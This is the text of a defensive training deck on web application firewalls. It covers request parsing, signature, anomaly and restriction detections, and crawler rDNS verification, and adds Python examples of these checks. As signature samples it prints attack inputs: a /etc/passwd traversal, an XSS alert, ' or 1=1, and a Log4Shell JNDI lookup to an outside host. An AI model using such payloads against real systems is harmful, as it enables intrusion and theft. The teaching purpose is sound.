The WAF book (Web App Firewall)

Slide 3
About: Lior Rotkovitch
1. High tech since 1994: QA, IT, pre-sales security, security consulting
2. New Product Introduction (NPI), for F5 ASM WAF since 2006
3. F5 SIRT, Sr Security Engineer since 2016: PSIRT,CSIRT
4. Content Developer - Since 2000
5. Community project:
SIRT.club – promote defensive security.
gohitech – leveraging high tech culture.
▪ Email: lior.rotkovitch@gmail.com
▪ Twitter: @rotkovitch
▪ LinkedIn: Lior Rotkovitch
▪ Instagram: L.Rotkovitch
4. 70295
©
1) Target
2) Attack
3) Security
4) Policy
5) Incidents
6) Architecture
7) Operations
8) Security management
9) Assessment
10) SIRT
Comply:
Learning objective:
• Understand the ecosystem 1,2,3
• Applying security value – 4
• When under attack – 5
• Security design – 6
• WAF SW sustaining – 7
• Security Operations – 8
• Evaluating WAF – 9
• Who is doing what - 10
6. 70295
©
HTTP Response
HTTP Request
Web App Paradigm
THE
WEB
TCP/IP – Connection
Clients Web Application
Request
• Protocols
• Payload – Headers
• User input
Response
• Protocols
• Payload – Headers
• App output
8. 70295
©
DEV.SEC.OPS
NF
Web Application
Unknown User
Web Bot
Requests
Responses
ABSTRACTION LAYER/S
automated traffic
Application/s
Request
handler/s
AAA
Mobile app/ {API}
Database/s
DEV
Perimeter/Ingress
OPS
SIRT
Web Site
DEVOPS
App Mesh
Cloud private /public
Zone X
CI/CD
• Microservice
• Container
• Pods
Web App ecosystem - Modern
WAF NG
Mobile Users
Ads/ 3rd party services Partners
Valuable User
Valuable User
SIEM ≈
Analytics ∑
Internet
Edge
10. 70295
©
Microservices   Data storage
login CP mgmt
ID
Browse
Web applications
Web
Server
App
Server
Database
Server
Classic
• Monolith
Cart
D B
Pay
Request/ Response
Manager
Zone 1 Zone 2
Classic Vs Modern
Modern
▪ Mesh app
▪ Microservices
Monomesh
o Classic / modern
3rd
13. 70295
©
HTTP Client Types
Device
OS
HTTP
Network
Tor
Devices:
• PC
• Laptop
• Tablet
• Mobile
• IoT
OS:
• Windows
• Linux
• MAC
• Android
• Containers
HTTP:
• Browser
• CLI tool
• Frameworks
• Scripting
• Mobile App
Networking – exit points
• ISP
• proxies
• VPN
• Tor
Networking media:
• Wire -> Router
• WiFi -> Router
• Mobile data
ISP
VPN
proxy
Clouds
WEB
14. 70295
©
Aggregated 21.21k 23.57 36.72k
172.29.46.46 2.75k 3.05 4.08k
192.168.1.14 2.26k 2.51 5.27k
192.168.190.191 2.25k 2.50 3.10k
10.10.1.200 2.23k 2.48 4.64k
10.0.0.138 2.01k 2.23 2.82k
[Chart: RPS per source IP (IP1–IP5) over 21 intervals]
[Chart: RPS on URL / over 21 intervals]
Expected Traffic Footprint
Top URL RPS Avr
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/forgot_pass 2.01k
Load % Numbers
CPU 70% 0/1/2
Memory 72% 80GB
Throughput 35% 11.7Mbps
RPS 25% 10k
GET /query.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: browser (Java/1.8.0_221)
Status: Online Performance: Ideal
16. 70295
©
Attack status brief
Type:
• Random
• Targeted Random
• Targeted
Motivation
• Fame Fun and Profit
• Just because they can
• New WAR battlefield
Execution:
• Vulnerability hunting
• DDoS
• Brute force
• Malware
• BotNet
• Automation
• More…
CLIENTS
THE
WEB
19. 70295
©
HTTP
Application/s
Request
handler/s Database/s
Attack Surface
Attack surface examples:
1. Code – Function, library, URL, Parameter
2. Infrastructure – OS, servers, virtualization, keys,
3. System – hardware, network, devices
Vulnerability location
Attack Surface – the place where the
vulnerability exists. Also refer to the entry
point for the exploit or the meeting place
between the exploit and the vulnerability.
Web Application
20. 70295
©
HTTP
Request
handler/s Database/s
Attack Agent
Operate from:
• Clouds
• Mobiles
• PC/ tablet
• IoT
Request generator tool
Attack Agent – the software vehicle
that is used to send the exploit to
the attack surface
Software Types:
• CLI
• Browser automation
• Client framework
Web Application
Application/s
21. 70295
©
HTTP
Request
handler/s Database/s
Exploit
Actual code that activates the vulnerability
Exploit – the code / pattern that
activates the vulnerability and allows
exploitation of the vulnerability.
Exploit types:
• POC exploit
• Exploitation exploit
• Weaponizing exploit – RCE
Web Application
Application/s
22. 70295
©
HTTP
Request
handler/s Database/s
Attack Vector
Attack technique and / or goal
Web Application
We use the same attack
elements for all the attacks. The
vector is the technique used to
achieve the goal
Goals:
• Deny service / impact performance – DoS
• Extract data from DB – SQLi
• Session stealing – XSS
• Account take over – brute force
Technique:
• DoS (floods, load)
• SQLi
• XSS
• Brute force
• Etc…
Application/s
23. 70295
©
Threat Landscape - Traditional
Users / HTTP clients
App SRV
Web SRV
Server/s
Database SRV
App owner
Web Exploits
Hacker playground
Web Application
▪ SQL injection
▪ Directory traversal
▪ Cross site attack
24. 70295
©
Threat Landscape - Modern
DEVOPS
partners
NF
Mobile Users
Ads/ 3rd party
services
Remote
employee
Web Bot
User
Requests
Responses
ABSTRACTION LAYER
Allowed
automated traffic
Application/s
Request
handler/s
Authorization
SIEM ≈
Analytics ∑
Mobile app/ API
Database/s
DEV
OPSSEC
INSIDER
HACKED
PURPOSE
BUILD BOTNET
Automation - battlefield
Cloud
${{:-}j
Internet
Cloud
26. 70295
©
Attack automation - Botnet – distributed
Exploit
pool
Bot MASTER
Purpose build
Hacked
Infected
App A
App B
App C
App D
App A
App B
App C
App D
App D
App B
App C
App A
App D
App C
App B
App A
Site 3
Site 2
Site 1
27. 70295
©
AMO – Attack Modus Operandi
App A
▪ Firepower
▪ Scheduler
▪ Parsing results
ISP
VPN
Tor
proxy
• Impersonating
• Multi purpose
• Evasions
▪ Infected
▪ Hacked
▪ purpose build
▪ Geolocations
▪ Random
▪ Morphing
AV: CAV
▪ Botnet
▪ Hive net
▪ Swarm net
E
HTTP IP
28. 70295
©
• SQLi
• XSS
• LFI/ RFI
• RCE
• CSRF
Web Exploits
• BF
• CS
• PS
ATO
• Floods
• Loads
DDoS
BOT/S
BOTNET/S
Web Application
Attack Surface /s
Vulnerabilities
Exploit
Attack Agent
ATTACK AUTOMATION
AUTO
Summary
29. 70295
©
Attack Traffic Footprint
[Chart: RPS on URL / over 21 intervals, attack traffic]
Top URL RPS Avr
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/noneexisting 2.01k
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ Attack Automation
GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
Host: sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/95.0.4638.54
32. 70295
©
1. DATA PLANE – ENGINES
2. CONTROL PLANE – SETTINGS
3. REPORTING – VISUALIZATION
1. DATA PLANE – ENGINES:
WEB APPLICATION
WEB CLIENTS
WAF SECURITY
ENGINEER
PARSER ENGINE
TRAPS ENGINE
ENFORCER ENGINE
33. 70295
©
Request engines phases in WAF
Application Firewall Engines
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL /index.php
User-Agent: Mozilla/5.00 (Nikto/2.1.6)
(Evasions:None) (Test:007240)
Source IP 192.168.1.1
Time 01:32:44
Detections: Signatures - User Agent
Python-urllib/2.6
Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
Mozilla/4.0 (Hydra)
Prevention action
Alarm
Block page
Reset conn
GET / HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:007240)
Parser
Traps Enforcer
Web Application
35. 70295
©
POST /login.php HTTP/1.1
Host: www.sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Accept-Language: en-US,en;q=0.9,he;q=0.8
Cookie: SESSION=2a59508d7509c6d2c21bbf5b
uname=meme&pass=god123
POST REQUEST
Post Data, Headers – Entities:
WEB CLIENTS
WEB APP
Entities
Host: sirt.club
Method: POST
HTTP version: 1.1
URL: login.php
Content-Length: 32
Content-Type application/x-www-form-urlencoded
Param 1 uname
Param 1 value meme
Param 2 pass
Param 2 value god123
POST Request Parsing
• HTTP headers
• Post data
https://sirt.club/login.php
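As an added example (not code from the deck or from any WAF product), the entity extraction the parser engine performs on a request like the one above; the sample POST is constructed, and its Content-Length matches its body so the length check passes:

```python
"""Added example: turn a raw HTTP request into the WAF 'entities' of the slide."""
from urllib.parse import parse_qsl, urlsplit

# Constructed sample, modelled on the slide's login POST (values are made up).
SAMPLE_POST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: www.sirt.club\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 22\r\n"
    "Cookie: SESSION=2a59508d7509c6d2c21bbf5b\r\n"
    "\r\n"
    "uname=meme&pass=god123"
)


def parse_request(raw: str) -> dict:
    """Parser engine: split a request into protocol, payload (headers) and user input."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)

    # Keep every occurrence of a header so a later restriction can spot a doubled Host.
    headers: dict[str, list[str]] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())

    url = urlsplit(target)
    params = parse_qsl(url.query, keep_blank_values=True)        # GET parameters
    content_type = headers.get("content-type", [""])[0]
    if content_type.startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(body, keep_blank_values=True)         # POST data parameters

    declared = headers.get("content-length", [""])[0]
    return {
        "method": method,
        "version": version.removeprefix("HTTP/"),
        "url": url.path,
        "host": headers.get("host", [""])[0],
        "headers": headers,
        "params": params,
        # int() on a garbage value (the incident log slide shows 'Content-Length: -40')
        # must not crash the WAF, so non-numeric values become None.
        "content_length": int(declared) if declared.lstrip("-").isdigit() else None,
        "body_length": len(body.encode()),
    }


def entity_rows(entities: dict) -> list[tuple[str, str]]:
    """Render the entities as the slide's 'Entities' table: (name, value) rows."""
    rows = [
        ("Host", entities["host"]),
        ("Method", entities["method"]),
        ("HTTP version", entities["version"]),
        ("URL", entities["url"]),
    ]
    if entities["content_length"] is not None:
        rows.append(("Content-Length", str(entities["content_length"])))
    for i, (name, value) in enumerate(entities["params"], 1):
        rows.append((f"Param {i}", name))
        rows.append((f"Param {i} value", value))
    return rows


def length_mismatch(entities: dict) -> bool:
    """True when the declared Content-Length is missing, negative or not the body size."""
    declared = entities["content_length"]
    return declared is None or declared < 0 or declared != entities["body_length"]
```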
36. 70295
©
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache
X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: Keep-Alive
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8326
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible"
content="IE=Edge"/>
<meta charset="UTF-8" />
<title>SIRT Club: Security Incident Response Teams
Club</title>
<script type="text/javascript">
</script>
</head>
<body>
<div id="logo">
<p> Text </p>
</body>
</html>
Entities
Response
Status Code
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache
X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8326
Response body
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<Body>
<p>SIRT protectors of the realm</p>
</Body>
</HTML>
HTTP Response Parser
WEB CLIENTS
WEB APP
RESPONSE
Payload
(headers)
Protocol
Server
output
37. 70295
©
TRAPS -> DETECTIONS:
Signatures - Pattern matching
Anomaly - Aggregation and thresholds
Client Interrogation - HTTP client inspection
Restrictions - Allow / Block lists
Protocol
Payload
User input
@
PARSER - ENTITY
39. 70295
©
Definition: pattern matching engine –
matching known words / keywords on entities
• Pros
• Powerful pattern matching engine (IPS)
• Block known exploits
• Virtual patching & Leak prevention
• Security visibility – export detection
• Cons
• False positives
• Management time
• Consuming resources
Signatures Attacks: Web Exploit, Bot UA, SQLi, XSS,
LFI,RFI, Command Execution, Predictable
Resource etc
GET /search.php?q=EXPLOIT HTTP/1.1
Connection: keep-alive
Host: sirt.club
User-Agent: Mozilla/5.00
Signature example
▪ Informational signature – User agent, defaults, general words
▪ Generic exploits signature – common web exploits
▪ Specific exploit signature – CVE/ real known exploits
40. 70295
©
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL /query.php
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Source IP 192.168.1.1
WAF User Agent signature
Python-urllib/2.6
Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Mozilla/4.0 (Hydra)
Signature: Informational
GET /query.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
SIGNATURES
ENTITIES DETECTIONS
WEB APP
41. 70295
©
POST /submit.php HTTP/1.1
Host: sirt.club
Connection: keep-alive
User-Agent: Mozilla/5.0
Accept: text/html,application/,*/*;
Content-Length: 142
Cookie: SESSION=aafa5676ce60d1b33b58c0dd6de6fa87;
{"secret_book": 6.9, "tlv_book": [<scripts>alert('lala')<script>]}
Signature – POST Data
<scripts>alert('lala')<script>
<scripts>
alert('')
<script>
' or 1=1
Parser (entities)
Host: sirt.club
Method: POST
HTTP version: 1.1
URL: submit.php
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html, image/webp, */*
POST Data
{"my_book": 1.1, "tlv_book":
[<scripts>alert('lala')<script>]}
SIGNATURES
Signature - Generic exploits
WEB APP
42. 70295
©
Signature – Specific Exploit
Application Firewall
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
URL GUI.php${jndi:ldap://webappz.com}
User-Agent: Mozilla/5.00
Source IP 192.168.1.1
Time 01:32:44
CVE signatures
/............winntwin.ini
..../..../boot.ini
${jndi:ldap://webappz.com}
${jndi:
Prevention action
Alert
Block page
Reset conn
GET /GUI.php${jndi:ldap://webappz.com} HTTP/1.1
Host: sirt.club
User-Agent: Mozilla/5.00
Web App
Application
Server/s
Web
Server/s
Database
Server/s
43. 70295
©
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2024 13:53:00 GMT
Server: Apache
X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: Keep-Alive
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8326
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta charset="UTF-8" />
<title>SIRT Club: Security Incident Response Teams
Club</title>
<script type="text/javascript">
</script>
</head>
<body>
<div id="logo">
<p> Text </p>
</body>
</html>
Response
Status Code
HTTP/1.1 200 OK
Date: Sat, 08 Jan 2022 13:53:00 GMT
Server: Apache
X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 8326
Response body
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<Body>
<p>Page Test </p>
</Body>
</HTML>
Signature - HTTP Response headers
WEB CLIENTS
RESPONSE
Headers
Response
body
Signature – Response Headers
Apache/2.1 (Unix) PHP/7.1.2
WEB APP
44. 70295
©
HTTP/1.1 200 OK
Date: Sun, 29 May 2022 13:13:13 GMT
Server: Apache/2.1 (Unix) PHP/7.1.2
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
<br>
<b>Warning</b>: Supplied argument is not a valid MySQL
result resource in <b> /var/htdocs/myapp/ </b> on line
<b>9</b><br>
<br>
<b>Warning</b>: Cannot add header information - headers
already sent by (output started at
/var/htdocs/myapp/login.php:9) in <b> /var/htdocs/myapp/
</b> on line <b>18</b><br>
Parser - Response
Response Status
Code
HTTP/1.1 200 OK
Date: Sun, 29 May 2022 13:13:13 GMT
Server: Apache/2.1 (Unix) PHP/7.1.2
Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Response body
<br>
<b>Warning</b>: Supplied argument is not a valid
MySQL result resource in <b> /var/htdocs/myapp/
</b> on line <b>9</b><br>
<br>
<b>Warning</b>: Cannot add header information -
headers already sent by (output started at
/var/htdocs/myapp/login.php:9) in <b>
/var/htdocs/myapp/ </b> on line <b>18</b><br>
RAW HTML Response
Signature – Response Body
“Supplied argument is not a valid MySQL result
resource in”
Signature - HTTP Response Body
<FORM name="search" action="search.php" method="GET">
<INPUT type="hidden" name="">
<INPUT type="text" name="query" size="25" value="">
<INPUT type="submit" name="" value="Search">
</FORM>
46. 70295
©
Anomaly
• Pros:
• Easy to use
• Effective automation detection
• Very effective in noisy attacks
• Clear indication of automation
• Cons:
• Needs fine-tuning for each site
• Advanced usage needs knowledge and experience
Anomaly example
▪ Request per second (RPS)
▪ Failed log in (FLI)
▪ Session opening
▪ Other detections : signatures, metachars etc
Definition: data aggregation engine –
a measure exceeding a defined threshold
Attacks: brute force, credential stuffing,
application DDoS, floods etc.
Above the threshold: attack
Below: ok
47. 70295
©
Internet
IP (Parser ) 5 min 20 min 1 hour AVG
10.0.0.138 50 60 180
192.168.1.1 180 0 0
172.29.44.6 400 350 3000
172.29.46.9 250 100 1000
10.1.1.1 1800 1200 800
192.168.24.24 0 100 150
Aggregated data – Policy limit per IP
Source IP: ANY @ 5 Min RPS limit
Min 220
Max 280
ANOMALY
Detection: Anomaly increase in RPS from IPs
48. 70295
©
Anomaly – increase in RPS on URL’s
Application Firewall
Internet
URL   RPS 5 min   20 min   1 hour AVG
Sell.php 500 600 1800
Help.php 120 100 100
Login.php 3000 6500 8000
Contact.us.php 1500 1000 800
1800 1800 1800
Promo.page.php 10 100 150
Aggregated data – Policy limit per IP
Source IP: ANY @ 5 Min RPS limit
Min 220
Max 280
sell.php
login.php
Contact.php
49. 70295
©
IP (Parser)   Sig count 5 min   Sig count 20 min   Sig count 1H
10.0.0.138 500 600 1800
192.168.1.1 20 50 100
172.29.44.6 0 1 0
172.29.46.9 0 0 4
10.1.1.1 4 4 4
192.168.24.24 1 1 1
Aggregated data – Policy limit: Signatures per IP
Source IP: ANY @ 5 Min Max signature from IP / 5min
Min 20
Max 80
Post max 150 -> shun for 12 hours
ANOMALY
Internet
Detection: Anomaly increase Sig from IP
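An added example (written for this page, not an F5 or deck implementation) of the anomaly trap behind slides 46–49: a sliding-window counter per key (source IP, URL, country) with the slides' Min/Max limits as alarm/block thresholds and the "post max" shun; the limits are read here as event counts per 5-minute window:

```python
"""Added example: a sliding-window anomaly trap with the deck's min/max thresholds."""
from collections import defaultdict, deque


class AnomalyTrap:
    """Counts events per key (source IP, URL, country) inside a sliding window.

    alarm_at / block_at are the slide's 'Min' / 'Max' policy limits; shun_at is the
    'post max' count after which the key is shunned for shun_seconds.
    """

    def __init__(self, window_seconds, alarm_at, block_at, shun_at=None, shun_seconds=0):
        self.window = window_seconds
        self.alarm_at, self.block_at = alarm_at, block_at
        self.shun_at, self.shun_seconds = shun_at, shun_seconds
        self._events = defaultdict(deque)   # key -> timestamps still inside the window
        self._shunned = {}                  # key -> time the shun expires

    def _window(self, key, now):
        q = self._events[key]
        while q and now - q[0] >= self.window:
            q.popleft()                     # drop events that aged out of the window
        return q

    def count(self, key, now):
        """Current aggregated count for key (the table cell on the slide)."""
        return len(self._window(key, now))

    def observe(self, key, now):
        """Record one event for key at time now and return the prevention action."""
        expiry = self._shunned.get(key)
        if expiry is not None:
            if now < expiry:
                return "shun"               # still banned: do not even count it
            del self._shunned[key]
        q = self._window(key, now)
        q.append(now)
        n = len(q)
        if self.shun_at is not None and n >= self.shun_at:
            self._shunned[key] = now + self.shun_seconds
            q.clear()                       # start counting afresh once the ban lifts
            return "shun"
        if n >= self.block_at:
            return "block"
        if n >= self.alarm_at:
            return "alarm"
        return "pass"


# Policies from the deck's anomaly slides, read as counts per 5-minute window
# (the slides write them as 'Min' and 'Max' limits; the 12-hour shun is from the
# signatures-per-IP slide).
POLICIES = {
    "rps_per_ip": AnomalyTrap(300, alarm_at=220, block_at=280),
    "signatures_per_ip": AnomalyTrap(300, alarm_at=20, block_at=80,
                                     shun_at=150, shun_seconds=12 * 3600),
    "failed_logins_per_ip": AnomalyTrap(300, alarm_at=300, block_at=1000),
}


def replay(trap, key, n, start=0.0, spacing=1.0):
    """Feed n evenly spaced events for key and return the action taken on each."""
    return [trap.observe(key, start + i * spacing) for i in range(n)]
```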
50. 70295
©
IP (Parser)   Current FLI /5 min   60 min FLI
10.0.0.138 60 180
192.168.1.1 0 0
172.29.44.6 35 40
172.29.46.9 100 1000
10.1.1.1 1800 3000
192.168.24.24 10 150
Aggregated data – Policy limit: FLI per IP
Source IP: ANY @ 5 Min FLI/IP over 5 min limit :
Min 300
Max 1000
Internet
Detection: Anomaly increase in FLI from IPs
Failed login
Try Again
ANOMALY
IP X
IP Y
IP Z
51. 70295
©
Anomaly – increase in FLI from Geo
Application Firewall
Internet
IP   IP to GEO   Current RPS   10m RPS
10.0.0.138 Country U 60 180
192.168.1.1 Country X 0 0
172.29.44.6 Country Y 350 3000
172.29.46.9 Country W 100 1000
10.1.1.1 Country V 1800 1800
192.168.24.24 Country Z 100 150
Aggregated data – Policy limit per IP
Source IP: country @ 5 Min RPS limit
Min 300
Max 1000
IP’s
52. 70295
©
Anomaly - Fixed Vs Ratio
[Charts: threshold per IP/URL, fixed vs ratio, App 1]
54. 70295
©
• Pros:
• A powerful and granular allow / deny
alerting and enforcement list
• Provides a schema for ETF
• Provide a schema for user input validation
• Holistic security
• Cons:
• Needs fine-tuning – false positives
• Needs management
• Blocking on first occurrence is limited;
counting hits and then blocking is best
Restrictions
Matching Allow / Block lists Restriction examples:
▪ Characters sets
▪ RFC & evasion
▪ Flow
▪ Structure
Definition: structure restriction engine
Attacks: SQLi, XSS, directory traversal,
evasions etc
Structure Allow
Schema Block
Methods Allow
RFC Block
Encoding Block
Protocol WebSocket Allow
Protocol HTTP 1.0 Block
55. 70295
©
Restrictions – size
Size Min Chars Max chars
GET Param value Min 3 chars Max 130 chars
Parser
(entities)
Value Size - found
Verb (Method) GET
Protocol HTTP 1.1
Parameter name q
Parameter value longlonglonglonglonglonglonglonglonglonglong
longlonglonglonglonglonglonglonglonglonglong
longlonglonglx00nglonglonglonglonglonglonglo
nglong
136 chars
Source IP 192.168.1.1
Time 01:32:44
http://sirt.club/search.php?q=longlonglonglonglonglonglonglon
glonglonglonglonglonglonglonglonglonglonglonglonglonglonglon
glonglonglonglonglonglonglonglonglonglonglong
Host: sirt.club
User-Agent: Mozilla/5.0
Accept: text/html,application/,*/*;
Payload size policy
RESTRICTIONS
56. 70295
©
Restrictions – HTTP RFC
RFC check @ any request   Policy – allow / deny
Header with no value Block
Double host header Block
HTTP verbs: POST Get HEAD Block
Null in request Block
Parameter value with ' Block
Protocol versions 1.1 Allow
Protocol versions 1.0 Block
Parser (entities) Value
Verb (Method) Head
Protocol HTTP 1.0
Parameter name q
Parameter value mc’mer
Host header 172.29.46.23
SIRT.CLUB
Time 11:11:11
Header123 _____
Accept text/html,application/,*/* %00;
RESTRICTIONS
OPTIONS /search.php?q=mc'mer HTTP/1.0
Host: SIRT.CLUB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114
Safari/237.36
Accept: text/html,application/,*/* %00;
Host: 172.29.44.44
Header123:
57. 70295
©
Restrictions – Meta characters
Parser (entities) Value
Verb (Method) GET
Protocol HTTP 1.1
Session D5!8ec55996a207ed
Parameter name q
Parameter value Mc’dogal
Source IP 1.1.1.1
Time 01:11:11
http://sirt.club/search.php?q=Mc’dogal
RESTRICTIONS
Metachar for any parameter value   ASCII (decimal code)   Policy – allow / deny
# %35 Allow
$ %36 Allow
% %37 Allow
& %38 Allow
' %39 Deny
/ %47 Deny
< %60 Deny
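An added example, not from the deck, of the restriction trap across slides 54–57: size, HTTP RFC and meta-character allow/deny checks over parsed entities; the allowed method and version sets are this example's reading of the slide tables, and the sample entities are constructed:

```python
"""Added example: the restriction trap (size, RFC and meta-character allow/deny lists)."""
from urllib.parse import unquote

# Policy values taken from the deck's restriction slides; the method and version
# lists are this example's reading of those slides.
POLICY = {
    "methods_allowed": {"GET", "POST", "HEAD"},
    "versions_allowed": {"1.1"},
    "param_value_chars": (3, 130),           # min / max chars of a GET parameter value
    "metachars_denied": {"'", "/", "<"},     # '#', '$', '%', '&' stay allowed
}


def check_restrictions(entities: dict, policy: dict = POLICY) -> list[tuple[str, str]]:
    """Return (restriction, detail) pairs for every policy violation in the entities."""
    violations = []
    if entities["method"].upper() not in policy["methods_allowed"]:
        violations.append(("method", entities["method"]))
    if entities["version"] not in policy["versions_allowed"]:
        violations.append(("protocol version", entities["version"]))

    headers = entities["headers"]                     # name -> list of values
    if len(headers.get("host", [])) != 1:
        violations.append(("double host header", ", ".join(headers.get("host", []))))
    for name, values in headers.items():
        for value in values:
            if value == "":
                violations.append(("header with no value", name))
            elif "\x00" in unquote(value):            # %00 smuggled into a header
                violations.append(("null in request", name))

    lo, hi = policy["param_value_chars"]
    for name, value in entities["params"]:          # values are already percent-decoded
        if "\x00" in value:
            violations.append(("null in request", name))
        if not lo <= len(value) <= hi:
            violations.append(("parameter size", f"{name}: {len(value)} chars"))
        bad = sorted(set(value) & policy["metachars_denied"])
        if bad:
            violations.append(("metachar", f"{name}: {' '.join(bad)}"))
    return violations


# Constructed entities echoing the deck's HTTP RFC slide (bad) and a clean search (ok).
RFC_VIOLATOR = {
    "method": "OPTIONS", "version": "1.0", "url": "/search.php",
    "headers": {"host": ["SIRT.CLUB", "172.29.44.44"], "user-agent": ["Mozilla/5.0"],
                "accept": ["text/html,application/,*/* %00;"], "header123": [""]},
    "params": [("q", "mc'mer")],
}
CLEAN_SEARCH = {
    "method": "GET", "version": "1.1", "url": "/search.php",
    "headers": {"host": ["sirt.club"], "user-agent": ["Mozilla/5.0"]},
    "params": [("q", "coffee & tea #1")],
}
```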
58. 70295
©
Search Engine name FQDN Count /1 day
Google .googlebot.com 150
Bing .msn.com 160
Ask .ask.com 10
GET /coffee HTTP/1.1
Host: sirt.club
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Connection: close
DNS Server
rDNS – does the IP in the lookup result match the arriving IP?
Source IP – x.y.z.z
Source IP – Y.Y.Y.Y
[Diagram: steps 1–5 of the rDNS query]
Restrictions – rDNS query
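An added example (not the deck's code) of the rDNS check above as forward-confirmed reverse DNS; the resolver functions are injectable so the constructed stub tables run offline, and the User-Agent tokens for the two engines shown are assumptions:

```python
"""Added example: forward-confirmed reverse DNS check for a claimed search-engine crawler."""
import socket

# Reverse-name suffixes from the deck's table (Google / Bing); the UA tokens are assumed.
CRAWLERS = {
    "google": {"ua_token": "Googlebot", "rdns_suffix": ".googlebot.com"},
    "bing": {"ua_token": "bingbot", "rdns_suffix": ".msn.com"},
}


def claimed_crawler(user_agent: str):
    """Which search engine (if any) does the User-Agent claim to be?"""
    ua = user_agent.lower()
    for engine, spec in CRAWLERS.items():
        if spec["ua_token"].lower() in ua:
            return engine
    return None


def verify_crawler(src_ip, user_agent, reverse=socket.gethostbyaddr, forward=socket.gethostbyname_ex):
    """Steps 1-5 of the slide: claim -> rDNS -> suffix check -> forward DNS -> IP match."""
    engine = claimed_crawler(user_agent)                    # 1. request claims to be a crawler
    if engine is None:
        return "not-a-claimed-crawler"
    try:
        fqdn = reverse(src_ip)[0].rstrip(".").lower()       # 2. PTR lookup of the source IP
    except OSError:
        return "no-rdns"
    if not fqdn.endswith(CRAWLERS[engine]["rdns_suffix"]):  # 3. name must be in the engine's domain
        return "rdns-domain-mismatch"
    try:
        forward_ips = forward(fqdn)[2]                      # 4. A lookup of that name
    except OSError:
        return "no-forward"
    if src_ip not in forward_ips:                           # 5. must map back to the source IP
        return "forward-mismatch"
    return "verified"


# Constructed resolver tables (documentation address ranges) so the check runs offline.
RDNS_TABLE = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",      # genuine-looking crawler
    "203.0.113.7": "scanner.example.net",                # scanner faking only the UA
    "198.51.100.5": "fake.googlebot.com",               # PTR record chosen by the IP's owner
}
FORWARD_TABLE = {
    "crawl-192-0-2-10.googlebot.com": ["192.0.2.10"],
    "scanner.example.net": ["203.0.113.7"],
    "fake.googlebot.com": ["192.0.2.99"],               # the real zone does not point back
}


def stub_reverse(ip):
    """Stand-in for socket.gethostbyaddr over the constructed table."""
    if ip not in RDNS_TABLE:
        raise OSError("no PTR record")
    return RDNS_TABLE[ip], [], [ip]


def stub_forward(name):
    """Stand-in for socket.gethostbyname_ex over the constructed table."""
    if name not in FORWARD_TABLE:
        raise OSError("no A record")
    return name, [], FORWARD_TABLE[name]
```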
59. 70295
©
HTTP/1.1 200 OK
Date: Mon, 29 May 2023 10:10:10 GMT
